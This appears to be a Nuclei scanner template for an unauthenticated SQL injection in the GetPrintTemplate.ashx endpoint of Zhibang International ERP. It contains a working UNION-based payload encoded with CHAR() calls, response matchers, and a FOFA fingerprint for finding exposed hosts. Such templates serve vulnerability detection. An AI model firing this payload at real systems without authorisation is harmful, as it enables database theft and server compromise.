http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - qjzzqEcQQhYOgmouBMKzBQoiAvjmAkvZGVnqKPhOtOGgIqkxjq
            - 转换成数据类型 int 时失败
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /SYSN/json/pcclient/GetPrintTemplate.ashx?sort=1&ord=-1+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2869%29%2BCHAR%2899%29%2BCHAR%2881%29%2BCHAR%2881%29%2BCHAR%28104%29%2BCHAR%2889%29%2BCHAR%2879%29%2BCHAR%28103%29%2BCHAR%28109%29%2BCHAR%28111%29%2BCHAR%28117%29%2BCHAR%2866%29%2BCHAR%2877%29%2BCHAR%2875%29%2BCHAR%28122%29%2BCHAR%2866%29%2BCHAR%2881%29%2BCHAR%28111%29%2BCHAR%28105%29%2BCHAR%2865%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28109%29%2BCHAR%2865%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%2890%29%2BCHAR%2871%29%2BCHAR%2886%29%2BCHAR%28110%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2880%29%2BCHAR%28104%29%2BCHAR%2879%29%2BCHAR%28116%29%2BCHAR%2879%29%2BCHAR%2871%29%2BCHAR%28103%29%2BCHAR%2873%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--+vlPx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
id: zhibangguojiERP-GetPrintTemplate_ashx-sql
info:
    author: Superhero
    description: |-
        fofa: icon_hash="-682445886"
        智邦国际ERP GetPrintTemplate.ashx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 智邦国际ERP GetPrintTemplate.ashx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/qOzPdQcvZJJzPcTimBHFHQ
    severity: high
    tags:
        - 智邦国际ERP
